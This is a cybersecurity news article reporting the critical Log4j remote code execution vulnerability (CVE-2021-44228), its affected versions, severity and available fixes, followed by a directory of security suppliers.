Critical Fault with Log4j Software

Attackers are actively exploiting a critical vulnerability in Apache Log4j, a logging library that's used in potentially millions of Java-based applications, including web-based ones. Organisations should immediately review if their apps, especially the publicly accessible ones, use the library and should implement mitigations as soon as possible.

This recently discovered vulnerability in Log4j 2 is reportedly being actively exploited, putting widely used applications and cloud services at high risk.

Researchers discovered a critical vulnerability in Apache Log4j library. Apache Log4j is part of the Apache Logging Project. By and large, usage of this library is one of the easiest ways to log errors, and that is why most Java developers use it. Now the Apache Software Foundation has released fixes to contain an exploited zero-day vulnerability affecting the widely-used Apache Log4j Java-based logging library that could be weaponised to execute malicious code and allow a complete takeover of vulnerable systems.

Log4j is used as a logging package in a variety of different popular software by companies including Amazon, Apple iCloud, ElasticSearch, Steam, Tesla, Twitter, and video games such as Minecraft. 

This  problem concerns a case of unauthenticated, remote code execution (RCE) on any application that uses the open-source utility and affects versions Log4j 2.0-beta9 up to 2.14.1. The bug has scored a perfect 10 on 10 in the CVSS rating system, indicative of the severity of the issue. "An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled," the Apache Foundation said in an advisory. "From Log4j 2.15.0, this behavior has been disabled by default."

Exploitation can be achieved by a single string of text, which can trigger an application to reach out to a malicious external host if it is logged via the vulnerable instance of Log4j, effectively granting the adversary the ability to retrieve a payload from a remote server and execute it locally. 

Given these problems with Log4j in enterprise IT and DevOps, it is vital for users to address the flaw immediately. 

The Israeli cyber security firm Cybereason has released a fix called Logout4Shell that closes out the shortcoming by using the vulnerability itself to reconfigure the logger and prevent further exploitation of the attack. "This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string," Security expert Marcus Hutchins said in a tweet.

CERT.NZ:   Hacker News:   Marcus Hutchins:    Kaspersky:    Techtarget:   Logging Apache:   CSO Online:  

You Might Also Read: 

How To Optimize The DevSecOps Pipeline:

 

« Britain's New Deals On Digital Trade & Cyber Security
Best Programming Languages For Cyber Security In 2022 »

CyberSecurity Jobsite
Perimeter 81

Directory of Suppliers

The PC Support Group

The PC Support Group

A partnership with The PC Support Group delivers improved productivity, reduced costs and protects your business through exceptional IT, telecoms and cybersecurity services.

Jooble

Jooble

Jooble is a job search aggregator operating in 71 countries worldwide. We simplify the job search process by displaying active job ads from major job boards and career sites across the internet.

LockLizard

LockLizard

Locklizard provides PDF DRM software that protects PDF documents from unauthorized access and misuse. Share and sell documents securely - prevent document leakage, sharing and piracy.

CYRIN

CYRIN

CYRIN® Cyber Range. Real Tools, Real Attacks, Real Scenarios. See why leading educational institutions and companies in the U.S. have begun to adopt the CYRIN® system.

ManageEngine

ManageEngine

As the IT management division of Zoho Corporation, ManageEngine prioritizes flexible solutions that work for all businesses, regardless of size or budget.

Site24x7

Site24x7

Site24x7 is an all-in-one performance monitoring solution for Networks, Websites, Servers and Applications.

Nubo Software

Nubo Software

Nubo’s Virtual Mobile Infrastructure creates a virtual corporate device on your employee smartphones and tablets. Enable unlimited mobility without leaving any data at risk.

RedSeal

RedSeal

RedSeal’s network modeling and risk scoring platform is the foundation for enabling enterprise networks to be resilient to cyber events.

Cyber Discovery

Cyber Discovery

Cyber Discovery, the UK Government's Cyber Schools Programme, is a learning programme designed to give young people the opportunity to learn the skills needed to enter the cyber security profession.

CYSEC Academy

CYSEC Academy

CYSEC Academy offer cyber certifications, cyber assurance and cyber defense training, hands-on learning training modules, public, private and bespoke training courses.

CRI4DATA

CRI4DATA

CRI4DATA's mission is to help organizations build their resilience to cyber risk.

AFNOR Group

AFNOR Group

AFNOR Group designs and deploys solutions based on voluntary standards around the world and provides services including training, professional and technical information, assessment and certification.

SimSpace

SimSpace

SimSpace is the visionary yet practical platform for measuring how your security system responds under actual, sustained attack.

Pentest360

Pentest360

Pentest360 is a 24x7x365 Penetration testing service offered through a feature-rich, centralised platform on the cloud that delivers instant visibility during security assessments.

State Service of Special Communications & Information Protection of Ukraine (SSSCIP)

State Service of Special Communications & Information Protection of Ukraine (SSSCIP)

State Service of Special Communications and Information Protection is the technical security and intelligence service of Ukraine, under the control of the President of Ukraine.

TXOne Networks

TXOne Networks

TXOne Networks offer cybersecurity solutions to protect your industrial control systems to ensure their reliability and safety from cyberattacks.

Torq

Torq

Torq's no-code automation modernizes how security & operations teams work with easy workflow building, limitless integrations and numerous pre-built templates.

StealthPath

StealthPath

StealthPath is focused on endpoint protection, securing the “implicit trust” vulnerabilities of current leading information security solutions.

Darknone Global

Darknone Global

Darknone is a consortium of elite hackers and security leaders united by an unbridled passion for augmenting the security of the digital realm.

RealDefense

RealDefense

RealDefense develops and markets various privacy, security and optimization technologies and services for consumers and small businesses.

vpnMentor

vpnMentor

We started vpnMentor to offer users a really honest, committed and helpful tool when navigating VPNs and web privacy.